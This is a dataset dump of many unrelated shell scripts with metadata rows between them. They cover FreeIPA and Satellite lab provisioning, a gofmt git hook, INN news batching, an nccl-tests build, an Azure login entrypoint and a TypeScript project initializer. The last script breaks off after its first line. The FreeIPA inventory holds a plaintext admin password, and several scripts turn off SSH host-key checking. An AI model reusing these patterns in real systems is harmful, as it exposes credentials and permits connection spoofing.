ipadm_password=Iahoora@123
ipaadmin_password=Iahoora@123
ipaserver_setup_dns=true
ipaserver_no_host_dns=true
ipaserver_auto_reverse=true
ipaserver_no_dnssec_validation=true
ipaserver_forwarders=192.168.1.1
ipaserver_reverse_zones=1.168.192.in-addr.arpa.
ipaserver_allow_zone_overlap=true
[ipaclients]
192.168.1.113
[ipaclients:vars]
ipaclient_domain=myhost.com
ipaadmin_principal=admin
ipaadmin_password=Iahoora@123
ipasssd_enable_dns_updates=yes
ipaclient_all_ip_addresses=yes
ipaclient_mkhomedir=yes
ipaserver_ip_addresses=192.168.1.112
EOF
#cd ~/.ansible/collections/ansible_collections/freeipa/ansible_freeipa/roles/ipaserver/
#ansible-playbook -i .inventory ~/.ansible/collections/ansible_collections/freeipa/ansible_freeipa/playbooks/install-server.yml
# Pull the packaged ansible-freeipa roles from the IdM host and install
# them locally so /usr/share/ansible/roles provides role "ipaserver".
ssh 192.168.1.112 "yumdownloader ansible-freeipa-0.1.12-6.el8"
scp 192.168.1.112:~/ansible-freeipa-0.1.12-6.el8.noarch.rpm /root/SiteSetup/RPMs/
yum localinstall -y /root/SiteSetup/RPMs/ansible-freeipa-0.1.12-6.el8.noarch.rpm
cat > /root/SiteSetup/Yaml/ansible.cfg << EOF
[defaults]
roles_path = /usr/share/ansible/roles
library = /usr/share/ansible/plugins/modules
module_utils = /usr/share/ansible/plugins/module_utils
EOF
cat > /root/SiteSetup/Yaml/setupIDM.yml << EOF
---
- name: Playbook to configure IPA server
  hosts: ipaserver
  become: true
#  vars_files:
#  - playbook_sensitive_data.yml
  roles:
  - role: ipaserver
    state: present
EOF
cd /root/SiteSetup/Yaml
ansible-playbook -i .inventory setupIDM.yml
####################################################################
# Second pass: RHEL 7.9 template and the Satellite VM.
cd /root/SiteSetup/Yaml
ansible-playbook -i .inventory create-vmFromImage.yml -e VMName=Template7.9 -e VMMemory=2GiB -e VMCore=1 -e ImageName=rhel-server-7.9-x86_64-kvm.qcow2 -e HostName=template7.9.myhost.com
ansible-playbook -i .inventory create-template.yml -e VMName=Template7.9 -e VMTempate=Template7.9
ansible-playbook -i .inventory create-vmFromTemplateWIP-satellite.yml -e VMName=satellite -e VMMemory=16GiB -e VMCore=6 -e HostName=satellite.myhost.com -e VMTempate=Template7.9 -e VMISO=rhel-server-7.9-x86_64-dvd.iso -e VMIP=192.168.1.113 -e VMDNS=192.168.1.112
ssh -o StrictHostKeyChecking=no 192.168.1.113
# Enroll the Satellite VM as an IPA client.
cat > setupIDMClient.yml << EOF
- name: Playbook to configure IPA clients with username/password
  hosts: ipaclients
  become: true
  roles:
  - role: ipaclient
    state: present
EOF
ansible-playbook -i .inventory setupIDMClient.yml
# Stage the Satellite DVD and run its installer on the client host.
scp -o StrictHostKeyChecking=no /root/SiteSetup/ISOs/satellite-6.8.0-rhel-7-x86_64-dvd.iso 192.168.1.113:~/
ssh -o StrictHostKeyChecking=no 192.168.1.113 "cd /mnt/sat/ && ./install_packages"
ansible-galaxy install oasis_roles.satellite
| true
|
61ec1d3038b0ca2af7a17487783fd38b0983f136
|
Shell
|
hi-sasaki/clean-architecture-golang-sample
|
/.pre-commit
|
UTF-8
| 346
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
# Git pre-commit hook: run gofmt over the staged Go files and re-stage any
# files it rewrites.

# Staged (added/copied/modified) Go files only.
gofiles=$(git diff --cached --name-only --diff-filter=ACM | grep '.go$')
[ -z "$gofiles" ] && exit 0

# -l lists the files that needed formatting, -w rewrites them in place.
# $gofiles is intentionally unquoted: it is a newline-separated list that must
# word-split into separate arguments (Go file names contain no whitespace).
# Fix: the echoed command now matches the command actually executed (the
# original printed "gofmt -s -w" but ran "gofmt -l -w").
echo "gofmt -l -w $gofiles"
unformatted=$(gofmt -l -w $gofiles)
[ -z "$unformatted" ] && exit 0

echo >&2 "Info: gofmt reformatted some Go files; re-staging them."
for fn in $unformatted; do
    # Quote the individual path when re-staging.
    git add "$fn"
done
exit 0
| true
|
b8e1421672bc93f88ad744f32f48e554a44bc3b6
|
Shell
|
SalomonBrys/Scripts
|
/bin/java_home
|
UTF-8
| 189
| 3.5
| 4
|
[] |
no_license
|
#!/bin/sh
# Print the JDK home directory, derived from the resolved location of javac.

# 'command -v' is the POSIX-standard way to locate a command; 'which' is a
# non-standard external tool.
jcPath=$(command -v javac 2> /dev/null)
if [ $? != 0 ]; then
    >&2 echo "Could not find javac. Is the JDK installed ?"
    exit 1
fi

# readlink -f resolves symlinks (e.g. /usr/bin/javac -> $JDK/bin/javac);
# stepping one directory up from bin/ yields the JDK home. Quote each
# expansion so paths with spaces survive.
realpath "$(dirname "$(readlink -f "$jcPath")")"/..
| true
|
5c5ee7b3368bda09879384b91e4f56e94d2e6440
|
Shell
|
carriejv/init-ts
|
/init-ts.sh
|
UTF-8
| 5,436
| 4.21875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Initializes a new Typescript repo with a minimal config.
# Template repository cloned as the skeleton of every new project.
INITTS_REPO="https://github.com/carriejv/init-ts.git"
# Base URL for raw SPDX license texts; "<SPDX-id>.txt" is appended below.
SPDX_LICENSE_REPO="https://raw.githubusercontent.com/spdx/license-list-data/master/text/"
# Terminal colors: cyan for prompts, green for progress steps, red for errors.
T_PROMPT=`tput setaf 6`
T_STEP=`tput setaf 2`
T_ERR=`tput setaf 1`
T_RESET=`tput sgr0`
# Error handler: print a message to stderr, optionally remove a partially
# created project directory, then exit.
# error <message> [status-code=1] [cleanup-dir]
# (The original header documented the message/status order backwards.)
error() {
    # Fix: diagnostics belong on stderr, not stdout, so they are never
    # swallowed by command substitution or pipelines.
    echo "$1" >&2
    if [[ -n "$3" ]]; then
        # Step out of the broken project directory and delete it.
        cd ..
        rm -rf "$3"
    fi
    exit ${2:-1}
}
# Check dependencies
# Abort early if any required external tool is missing from PATH.
MISSING_DEPS=0
for dep in sed curl npm git; do
    if ! command -v $dep>/dev/null 2>&1; then
        echo "${T_ERR}Missing required dependency [${T_RESET}${dep}${T_ERR}]."
        MISSING_DEPS=1
    fi
done
if [[ 1 -eq $MISSING_DEPS ]]; then
    error "${T_ERR}Exiting...${T_RESET}"
fi
# Make project dir and get package info
# Interactive prompts; blank answers fall back to the bracketed defaults.
read -p "${T_PROMPT}Enter package name: ${T_RESET}" PKGNAME
if [[ -z "$PKGNAME" ]]; then
    error "${T_ERR}Package name is required. Exiting...${T_RESET}"
fi
if [[ -d "$PKGNAME" ]]; then
    error "${T_ERR}Directory [${T_RESET}${PWD}/${PKGNAME}${T_ERR}] already exists. Exiting...${T_RESET}"
fi
read -p "${T_PROMPT}Enter project description: ${T_RESET}" PKGDESC
if [[ -z "$PKGDESC" ]]; then
    error "${T_ERR}Package description is required. Exiting...${T_RESET}"
fi
read -p "${T_PROMPT}Enter project license (spdx id) [${T_RESET}Apache-2.0${T_PROMPT}]: ${T_RESET}" PKGLICENSE
PKGLICENSE=${PKGLICENSE:-"Apache-2.0"}
read -p "${T_PROMPT}Enter remote repo url (not including .git) [${T_RESET}https://github.com/carriejv/${PKGNAME}${T_PROMPT}]: ${T_RESET}" REMOTEREPO
REMOTEREPO=${REMOTEREPO:-"https://github.com/carriejv/$PKGNAME"}
read -p "${T_PROMPT}Enter developer name [${T_RESET}Carrie J V${T_PROMPT}]: ${T_RESET}" DEVNAME
DEVNAME=${DEVNAME:-"Carrie J V"}
read -p "${T_PROMPT}Enter developer email [${T_RESET}carrie@carriejv.com${T_PROMPT}]: ${T_RESET}" DEVEMAIL
DEVEMAIL=${DEVEMAIL:-"carrie@carriejv.com"}
read -p "${T_PROMPT}Enter developer website url [${T_RESET}https://www.carriejv.com${T_PROMPT}]: ${T_RESET}" DEVURL
DEVURL=${DEVURL:-"https://www.carriejv.com"}
mkdir -p "$PKGNAME"
cd "$PKGNAME"
# Clone init-ts repo.
echo "[1/5] ${T_STEP}Cloning [${T_RESET}${INITTS_REPO}${T_STEP}] into project directory...${T_RESET}"
git clone $INITTS_REPO .
# Drop template-only artifacts: the template manifest becomes the real
# package.json, and this script plus the stale lockfile are removed.
mv package-template.json package.json
rm init-ts.sh
rm package-lock.json
# Generate a README and LICENSE
echo "[2/5] ${T_STEP}Generating README and LICENSE files...${T_RESET}"
echo "# $PKGNAME
TODO: Everything (literally).
# License
[$PKGLICENSE]($REMOTEREPO/blob/master/LICENSE)" > README.md
# Download the SPDX license text; --write-out appends the HTTP status code to
# the end of the LICENSE file so it can be inspected below.
curl -sL --write-out "%{http_code}" "$SPDX_LICENSE_REPO/$PKGLICENSE.txt" > LICENSE
# Last line of the file is the status code curl appended.
STATUS_CODE=$(sed -n '$p' LICENSE)
if [[ "200" != "$STATUS_CODE" ]]; then
    error "${T_ERR}Could not find license text for [${T_RESET}${PKGLICENSE}${T_ERR}] at [${T_RESET}${SPDX_LICENSE_REPO}/${PKGLICENSE}.txt${T_ERR}]. Exiting...${T_RESET}" 1 "$PKGNAME"
fi
# Strip the appended status code again.
# NOTE(review): this deletes EVERY 3-digit number in the 100-599 range anywhere
# in the license text, not just the trailing status code -- confirm acceptable.
sed -i -E 's/[1-5][0-9]{2}//gm' LICENSE
# Warn about weird licenses.
if [[ "MIT ISC BSD GPL Apache-2.0" != *"$PKGLICENSE"* ]]; then
    echo "License autofill is untested with [$PKGLICENSE]."
    echo "The script will make its best effort, but please double check!"
fi
# Fill in the SPDX placeholder tokens (<owner>, <year>, ...).
sed -i -E "s/\<copyright holders\>|\<owner\>/$DEVNAME/gm" LICENSE
sed -i -E "s/\<year\>/$(date +'%Y')/gm" LICENSE
# Stick Apache-2.0 header on index.ts
if [[ "Apache-2.0" == "$PKGLICENSE" ]]; then
    TEMP_FILE=$(mktemp)
    echo "/**
 * Copyright [yyyy] [name of copyright owner]
 *
 * Licensed under the Apache License, Version 2.0 (the \"License\");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an \"AS IS\" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */" > "$TEMP_FILE"
    sed -i -E "s/\[name of copyright owner\]/$DEVNAME/gm" "$TEMP_FILE"
    sed -i -E "s/\[yyyy\]/$(date +'%Y')/gm" "$TEMP_FILE"
    # Prepend the header by writing it first and appending the original file.
    cat src/index.ts >> "$TEMP_FILE"
    cp "$TEMP_FILE" src/index.ts
fi
# Fill in package info.
echo "[3/5] ${T_STEP}Substituting package info...${T_RESET}"
# Recursively sed-substitute provided pkg info into default files from repo.
# _sub_user_info_item <key> <value> <directory>
# Replaces every %key% token with <value> in all files under <directory>.
_sub_user_info_item() {
    for file in "$3"/*; do
        if [[ -d "$file" ]]; then
            # Fix: "$file" already carries the "$3/" prefix from the glob
            # above. The original recursed with "$3/$file", producing a bogus
            # doubled path, so subdirectories were silently never processed.
            _sub_user_info_item "$1" "$2" "$file"
        else
            sed -i "s#%$1%#$2#gm" "$file"
        fi
    done
}
# Substitute each collected value for its %TOKEN% across the cloned tree.
# ${!subitem} is bash indirect expansion: the value of the named variable.
for subitem in PKGNAME PKGDESC DEVNAME DEVEMAIL DEVURL REMOTEREPO PKGLICENSE; do
    _sub_user_info_item "$subitem" "${!subitem}" .
done
# Force update npm dependencies and build + test the base repo
echo "[4/5] ${T_STEP}Updating NPM dependencies to latest and validating build/test...${T_RESET}"
# NOTE(review): "--save/--save-dev" is not a valid npm flag (it is parsed as a
# single unknown option) -- confirm the intended flags, e.g. "--save".
npm update --save/--save-dev --force
npm run test
if [[ 0 -ne $? ]]; then
    # Tests failed: error() removes the half-initialized project directory.
    error "${T_ERR}Encountered an error running tests. Exiting...${T_RESET}" 1 "$PKGNAME"
fi
echo "[5/5] ${T_STEP}Scrapping init-ts .git and initializing a fresh git repo...${T_RESET}"
# Detach from the template's history and start a clean repository.
rm -rf .git
git init
echo "This script does not make an initial commit or set the remote repo."
echo "${T_STEP}Successfully initialized [${T_RESET}${PKGNAME}${T_STEP}]!${T_RESET}"
|
c6cbc36329ac3466e0072e7aa6ca8050386953ab
|
Shell
|
willneedit/rockchip-mkbootimg
|
/mkcpiogz
|
UTF-8
| 303
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
# Create initramfs.cpio.gz
# Author: Julien Chauveau <julien.chauveau@neo-technologies.fr>
# Usage: mkcpiogz <directory>

# Require exactly one argument naming an existing directory. Quote "$1" so a
# path containing spaces (or an empty argument) does not break the test.
if [ $# != 1 ] || [ ! -d "$1" ]; then
	echo "Usage: ${0##*/} <directory>" ; exit 1
fi

# Abort if the directory cannot be entered (permissions, race with rm, ...).
cd "$1" || exit 1
DIR=$(pwd)
IMG=$DIR.cpio.gz

# Run inside a root shell so file ownership/permissions are captured in the
# archive. The output path is quoted inside the sh -c string so directory
# names with spaces still redirect to a single file.
sudo sh -c "find . | cpio -H newc -o | gzip -9 > \"$IMG\""
echo "Archive created: $IMG"
| true
|
f776ff6af71ca5fcd4f6dc99cde44447ba518b42
|
Shell
|
jiajunhuang/4.4BSD-Lite2
|
/usr/src/contrib/news/inn/samples/send-uucp
|
UTF-8
| 2,279
| 3.53125
| 4
|
[
"BSD-4-Clause-UC",
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#! /bin/sh
## $Revision: 1.11 $
## SH script to send UUCP batches out.
## Reads INN's shell configuration (paths, lock dir, batch dir) and, for each
## target site, flushes its outgoing batch via innd and queues compressed
## cunbatch jobs through uux, capped at MAXJOBS per site.
## =()<. @<_PATH_SHELLVARS>@>()=
. /var/spool/news/data/innshellvars
PROGNAME=`basename $0`
LOCK=${LOCKS}/LOCK.${PROGNAME}
LOG=${MOST_LOGS}/${PROGNAME}.log
MAXJOBS=200
UUXFLAGS="- -r -gd"
## Start logging.
## All further stdout/stderr is appended to the per-program log file.
test ! -f ${LOG} && touch ${LOG}
chmod 0660 ${LOG}
exec >>${LOG} 2>&1
echo "${PROGNAME}: [$$] begin `date`"
cd ${BATCH}
## Anyone else there?
## Remove the lock on HUP/INT/QUIT/TERM; exit quietly if another run holds it.
trap 'rm -f ${LOCK} ; exit 1' 1 2 3 15
shlock -p $$ -f ${LOCK} || {
    echo "${PROGNAME}: [$$] locked by [`cat ${LOCK}`]"
    exit 0
}
## Who are we sending to?
## Explicit site list from the command line, otherwise a schedule keyed on the
## current hour.
if [ -n "$1" ] ; then
    LIST="$*"
else
    LIST=""
    case `date +%H` in
    01|04|07|21|23)
        LIST="kurz-ai aoa clsib21 leafusa metasoft"
        ;;
    06|12|15|17|20)
        LIST="esca"
        ;;
    esac
fi
## Without uustat, snapshot the uucp queue once via uuq for later counting.
case ${HAVE_UUSTAT} in
DONT)
    TEMP=${TMPDIR}/uuq$$
    uuq -h |tr -d : >${TEMP}
    ;;
esac
## Do the work...
for SITE in ${LIST}; do
    ## See if any data is ready for host.
    BATCHFILE=${SITE}.uucp
    ## Fold in any leftovers from a previously interrupted run first.
    if [ -f ${SITE}.work ] ; then
        cat ${SITE}.work >>${BATCHFILE}
        rm -f ${SITE}.work
    fi
    ## Rename the live batch aside, ask innd to flush (reopen) it, then append
    ## the renamed data to the site's uucp batch file.
    mv ${SITE} ${SITE}.work
    ctlinnd -s -t30 flush ${SITE} || continue
    cat ${SITE}.work >>${BATCHFILE}
    rm -f ${SITE}.work
    if [ ! -s ${BATCHFILE} ] ; then
        echo "${PROGNAME}: [$$] no articles for ${SITE}"
        rm -f ${BATCHFILE}
        continue
    fi
    ## Get number of jobs for the current site.
    case ${HAVE_UUSTAT} in
    DONT)
        JOBS=`${AWK} \
'BEGIN{X=0} {if ($1 == "'$SITE'") X=$2} END{print X}' <${TEMP}`
        ;;
    DO)
        JOBS=`uustat -s${SITE} | grep rnews | wc -l`
        ;;
    *)
        JOBS=0
        ;;
    esac
    ## Skip sites whose uucp queue is already full.
    if [ ${JOBS} -ge ${MAXJOBS} ] ; then
        echo "${PROGNAME}: [$$] ${JOBS} files already queued for ${SITE}"
        continue
    fi
    QUEUEJOBS=`expr ${MAXJOBS} - ${JOBS}`
    ## Get the compression flags.
    echo "${PROGNAME}: [$$] begin ${SITE}"
    case "${SITE}" in
    esca)
        COMPRESS="compress -b12"
        ;;
    *)
        COMPRESS="compress"
        ;;
    esac
    ## batcher splits the batch file into at most QUEUEJOBS jobs; each job is
    ## prefixed with the cunbatch header, compressed, and handed to uux for
    ## delivery to the remote rnews.
    time batcher -N ${QUEUEJOBS} \
	-p"(echo '#! cunbatch' ; exec ${COMPRESS} ) | uux ${UUXFLAGS} %s!rnews" \
	${SITE} ${BATCHFILE}
    echo "${PROGNAME}: [$$] end ${SITE}"
done
case ${HAVE_UUSTAT} in
DONT)
    rm -f ${TEMP}
    ;;
esac
## Remove the lock file.
rm -f ${LOCK}
echo "${PROGNAME}: [$$] end `date`"
| true
|
74edaca7f05aa326a8e97b6c14e5233eabf56df7
|
Shell
|
awslabs/libfabric-ci-scripts
|
/install-nccl-tests.sh
|
UTF-8
| 782
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Clone and build NVIDIA's nccl-tests against the EFA-installer Open MPI and a
# locally built NCCL, targeting compute capability 8.0 (A100).

# Abort immediately if the clone, patch, or build fails instead of running the
# remaining steps against a broken tree.
set -e

NCCL_TESTS_VERSION="v2.0.0"

cd "$HOME"
git clone -b "$NCCL_TESTS_VERSION" https://github.com/NVIDIA/nccl-tests
pushd nccl-tests
# TODO: We need to apply the patch in commit https://github.com/NVIDIA/nccl-tests/commit/0f173234bb2837327d806e9e4de9af3dda9a7043
# to add the LD_LIBRARY_PATH of openmpi shipped in efa installer (ended as lib64 on fedora distros). This commit is merged
# in nccl-tests's main branch but not in any stable release. Update the version number when this fix is taken in and remove
# this patch line.
sed -i s/'NVLDFLAGS += -L$(MPI_HOME)\/lib -lmpi'/'NVLDFLAGS += -L$(MPI_HOME)\/lib -L$(MPI_HOME)\/lib64 -lmpi'/ src/Makefile
make MPI=1 MPI_HOME=/opt/amazon/openmpi NCCL_HOME="$HOME/nccl/build" NVCC_GENCODE="-gencode=arch=compute_80,code=sm_80"
popd
| true
|
b137fc355c64370fe81f502f27e038923d90eccd
|
Shell
|
u16suzu/dot_files
|
/.zsh/setting/command.sh
|
UTF-8
| 688
| 3.421875
| 3
|
[] |
no_license
|
### Run `git add` and `git commit` in one step (zle widget; accepts the
### current line first, then stages everything and commits with $1 as message).
git_add_commit(){
    zle accept-line
    git add . && git commit -m $1;
}
zle -N git_add_commit
alias ga="git_add_commit"
### Open an image with macOS Preview when the command line is empty.
open_image_with_preview(){
    zle accept-line
    if [[ -z "$BUFFER" ]]; then
        open -a preview $1;
    fi
}
zle -N open_image_with_preview
alias open_image="open_image_with_preview"
### Pressing Enter on an empty command line runs `ls`.
alls() {
    zle accept-line
    if [[ -z "$BUFFER" ]]; then
        echo ''
        ls
    fi
}
zle -N alls
# Rebind Enter (Ctrl-M) to the alls widget.
bindkey "\C-m" alls
### Create a directory and cd into it in one step ($_ is the last argument of
### the previous command, i.e. the directory just created).
mkcd() {
    mkdir -p "$1" && cd "$_"
}
| true
|
190e6a35c0628b774671fd1de256acf9a483aeed
|
Shell
|
Gimba/BashUtils
|
/prod_25C
|
UTF-8
| 577
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
# Run a chain of AMBER pmemd.cuda production MD segments at 25C.
# Usage: prod_25C <first-index> <last-index>; segment i restarts from the
# .rst file written by segment i-1. The topology name is taken from the
# current directory's basename.
if [ ! -d "productions" ]; then
    mkdir productions
fi
infile=${PWD##*/}
# if [ "$#" -gt 2 ]; then
# infile=$3
# fi
# echo $infile
path=${PWD}
for i in $(seq $1 $2)
do
    last=$((i-1))
    # -c: restart coords from previous segment; -o/-r/-x/-inf: per-segment
    # output, restart, trajectory and info files.
    pmemd.cuda -O -i /d/as2/u/rm001/BashUtils/InputFiles/prod_25C.in -p $infile.prmtop -c productions/prod_$last.rst -o productions/prod_$i.out -r productions/prod_$i.rst -x productions/prod_$i.nc -inf productions/prod_$i.info
    # NOTE(review): prod_$2.rst only exists once the FINAL segment has written
    # its restart file, so this normally mails once at the end -- but it fires
    # on every later iteration if the file pre-exists. Confirm the intent
    # (perhaps `[ $i -eq $2 ]` was meant).
    if [ -f productions/prod_$2.rst ]; then
        echo " " | mailx -s "$HOST $CUDA_VISIBLE_DEVICES: $path $infile production $i finished" ucbtmc7@ucl.ac.uk
    fi
done
| true
|
7cfeb119a069291a6d713f2aa70ba5963d0ec376
|
Shell
|
janikvonrotz/lorauna
|
/task
|
UTF-8
| 487
| 3.765625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Task runner: dispatches the sub-command given as $1 (see ./task.md).
# Fix: this script uses `set -o pipefail` and previously the bash-only
# `function name()` syntax, neither of which is guaranteed under a dash-like
# /bin/sh -- so it must declare bash explicitly.
set -eo pipefail

# load env vars from .env, stripping comments; word-splitting of the
# unquoted expansion is intentional (one VAR=value token per export).
if [ -f .env ]
then
    export $(cat .env | sed 's/#.*//g' | xargs)
fi

# Print usage; the command table lives in ./task.md as a markdown table.
help() {
    echo
    echo "$1 <command> [options]"
    echo
    echo "commands:"
    echo
    column -t -s"|" ./task.md | tail -n +3
    echo
}

install() {
    npm install
}

case "$1" in
    install)
        install
        ;;
    dump)
        # Sourced (not executed) so it can export variables into this shell.
        . ./scripts/mongo-dump
        ;;
    restore)
        ./scripts/mongo-restore
        ;;
    *)
        help task
        exit 1
esac
| true
|
759626cc54e26dd0240f11a61f01721634b29764
|
Shell
|
shangwen/StandaloneOnYarn
|
/bin/standalone-yarn.sh
|
UTF-8
| 458
| 2.828125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Launcher for StandaloneOnYarn: submits the bundled jar through `hadoop jar`.
# Usage: standalone-yarn.sh startAmServer | <cmd> [arg1] [arg2]

SCRIPT_DIR="$(cd "$(dirname "$0")"; pwd)"
export STANDALONE_ON_YARN_HOME="$(cd "$SCRIPT_DIR/.."; pwd)"

# Fix: quote "$1" -- the unquoted test was a syntax error ("unary operator
# expected") whenever the script was invoked without arguments.
if [ "$1" = "startAmServer" ] ; then
    # NOTE(review): this echoes lib/standalone-yarn-0.1.jar but the command
    # below runs the jar from the package root -- confirm which path is real.
    echo $STANDALONE_ON_YARN_HOME/lib/standalone-yarn-0.1.jar
    hadoop jar $STANDALONE_ON_YARN_HOME/standalone-yarn-0.1.jar com.jd.bdp.yarn.client.StandaloneYarn startAmServer
else
    # $1-$3 stay unquoted on purpose: absent arguments must be dropped rather
    # than passed as empty strings.
    hadoop jar $STANDALONE_ON_YARN_HOME/standalone-yarn-0.1.jar com.jd.bdp.yarn.client.StandaloneYarn $1 $2 $3
fi
| true
|
edc4195f8cef3898d9d347dfb6796986a16baafc
|
Shell
|
mmitrik/github-actions
|
/login/entrypoint.sh
|
UTF-8
| 647
| 3.5
| 4
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
#!/bin/bash
# Log in to Azure with a service principal, then select a subscription.
# Requires AZURE_SERVICE_APP_ID, AZURE_SERVICE_PASSWORD, AZURE_SERVICE_TENANT;
# AZURE_SUBSCRIPTION is optional when the account has exactly one subscription.
set -e

if [[ -n "$AZURE_SERVICE_APP_ID" ]] && [[ -n "$AZURE_SERVICE_PASSWORD" ]] && [[ -n "$AZURE_SERVICE_TENANT" ]]
then
    az login --service-principal --username "$AZURE_SERVICE_APP_ID" --password "$AZURE_SERVICE_PASSWORD" --tenant "$AZURE_SERVICE_TENANT"
else
    echo "One of the required parameters for Azure Login is not set: AZURE_SERVICE_APP_ID, AZURE_SERVICE_PASSWORD, AZURE_SERVICE_TENANT." >&2
    exit 1
fi

if [[ -n "$AZURE_SUBSCRIPTION" ]]
then
    # Fix: the original passed the invalid flag `--s`; the real long flag is
    # --subscription (short form -s).
    az account set --subscription "$AZURE_SUBSCRIPTION"
else
    # Fix: the original captured the JSON output of `az account list` into a
    # plain string and took ${#SUBSCRIPTIONS[@]}, which is always 1 (and then
    # compared with `>`, a lexicographic operator). Count subscriptions with a
    # JMESPath length() query instead.
    SUBSCRIPTION_COUNT=$(az account list --query 'length(@)' -o tsv)
    if [[ "$SUBSCRIPTION_COUNT" -gt 1 ]]
    then
        echo "AZURE_SUBSCRIPTION is not set." >&2
        exit 1
    fi
fi
| true
|
4a56fb83b39b38b0d51cffb37c9e832c152e9e52
|
Shell
|
supreet-s8/VISP
|
/GuavusTools/bin/INSTALL/list-job-times-new.sh
|
UTF-8
| 543
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# For every oozie job configured on the collector master, print whether its
# done-marker exists in HDFS (i.e. whether the job has run yet).
# Master VIP: the host after the last ':' on the "master" line of the hadoop
# config, with whitespace stripped.
COL1VIP=`/opt/tps/bin/pmx.py subshell hadoop show config | grep 'master' | awk -F":" '{print $NF}'| sed -e 's/\s//g'`
# Non-interactive ssh: short timeout, no host-key prompting or persistence.
SSH="ssh -q -o ConnectTimeout=10 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null"
# Job names are the config paths preceding "/jobStart", with leading
# whitespace trimmed.
for i in `$SSH root@$COL1VIP "/opt/tps/bin/pmx.py subshell oozie show config all | grep jobStart" | awk -F'/jobStart' '{print $1}' | sed -e 's/^\s*//g'`
do
    printf "$i\t\t: "
    # Prints the done marker's content when present; exit status drives the
    # "not yet run" message below.
    $SSH root@$COL1VIP "/opt/hadoop/bin/hadoop dfs -cat /data/$i/done.txt 2>/dev/null"
    if [[ $? -ne '0' ]]; then echo "JOB, YET TO RUN!"; fi
done
| true
|
881297d462b2f3b6707c28e4cec1b2f24bf29c20
|
Shell
|
liqiang76/tinyos_cxl
|
/apps/breakfast/bacon/cxUnitTests/cxl/testLink/reliabilityTest.sh
|
UTF-8
| 1,261
| 3.953125
| 4
|
[] |
no_license
|
#!/bin/bash
# Link-reliability experiment: for each routing setup ("cx" and "sp"), run
# numTrials random node configurations and trigger txPerTrial transmissions
# from the source, logging timestamps for later analysis. Node control is done
# by sending single characters to per-node TCP ports (17000 + node id).
#input: src, dest, failure rate p
# number of trials (selections of nodes)
if [ $# -lt 4 ]
then
  echo "Usage: $0 db src dest failureRate" 1>&2
  exit 1
fi
db=$1
src=$2
dest=$3
fr=$4
numTrials=10
txPerTrial=20
# Send a command string to node <id>, one character at a time, pausing <delay>
# seconds after each character. Usage: sendCommandGeneric <delay> <id> <chars>
function sendCommandGeneric(){
  delay=$1
  id=$2
  shift 2
  s="$@"
  for (( i=0; i<${#s}; i++ ))
  do
    # Each node listens on TCP port 17000+id for single-character commands.
    echo "${s:$i:1}" | nc localhost $((17000 + $id))
    sleep $delay
  done
}
# Same, with no inter-character delay.
function sendCommandNoDelay(){
  sendCommandGeneric 0 $@
}
# Send 'q' (quit/reset) to every node id 1..60.
function resetNetwork(){
  for node in $(seq 60)
  do
    sendCommandNoDelay $node q
  done
}
# Trigger one transmission ('t') on the given node.
function tx(){
  #0.4 delay is to let the tx finish: 10 hops, ~31 ms per hop=0.3 S
  sendCommandGeneric 0.4 $1 t
}
for setup in "cx" "sp"
do
  setupStart=$(date +%s)
  echo "$setupStart SETUP_START $setup $src $dest $fr"
  resetNetwork
  for i in $(seq $numTrials)
  do
    #on each TX, randomly set up the nodes to sleep or rx/forward.
    #this simulates a single connection.
    trialStart=$(date +%s)
    # randomize.py emits "<node-id> <command>" lines; each is logged and
    # forwarded to the node.
    python randomize.py $db $setup $src $dest $fr | while read nodeCommand
    do
      echo "$trialStart TRIAL $setupStart $nodeCommand"
      sendCommandNoDelay $nodeCommand
    done
    sleep 0.1
    # Fire the configured number of transmissions from the source node.
    for k in $(seq $txPerTrial)
    do
      tx $src
    done
    sleep 1.5
  done
done
| true
|
de82eee35881ed25c48c983fabef270eb07d83fa
|
Shell
|
jrkwon/LAB
|
/workspace_temp/scripts/copy/copy_wflw_images.sh
|
UTF-8
| 255
| 3.046875
| 3
|
[
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
# Copy images from ~/Download and untar
# Usage: copy_wflw_images.sh <dataset-name>
# Copies ~/Downloads/<name>_images.tar.gz into ./datasets/<name>/, extracts it
# there, and removes the copied tarball.

# Fail early when the dataset name is missing; the original would create
# ./datasets/ and only fail later at the cp.
if [ -z "$1" ]; then
    echo "Usage: $0 <dataset-name>" >&2
    exit 1
fi

FILE=$1
TARGET_DIR=./datasets/$FILE

mkdir -p "$TARGET_DIR"
cp ~/Downloads/"${FILE}_images.tar.gz" "$TARGET_DIR"/.
TAR_FILE_ANNO=$TARGET_DIR/${FILE}_images.tar.gz
tar -zxvf "$TAR_FILE_ANNO" -C "$TARGET_DIR"
rm "$TAR_FILE_ANNO"
| true
|
623e31751f8f81257cb9abb243292d66f972a306
|
Shell
|
scarfacedeb/setup_linux
|
/install
|
UTF-8
| 197
| 2.9375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Install general apps
# Must be run from the repository root: functions.sh and apt.sh are sourced
# with relative paths.
set -e

SETUP_ROOT=$(pwd)

# Shared helper functions used by the sourced setup scripts.
. functions.sh

# Switch the invoking user's login shell to zsh.
setup_system () {
  chsh -s /usr/bin/zsh
}

#sudo bash -c "source $SETUP_ROOT/apt.sh"
# apt.sh installs the package list; sourced so it shares this shell's state.
. apt.sh
setup_system
| true
|
fd992788565ea1d179bbdc616f4a11533d48ffe2
|
Shell
|
gfontenot/xcode-cli
|
/src/commands/xcode-open
|
UTF-8
| 981
| 4.28125
| 4
|
[] |
no_license
|
#!/bin/sh
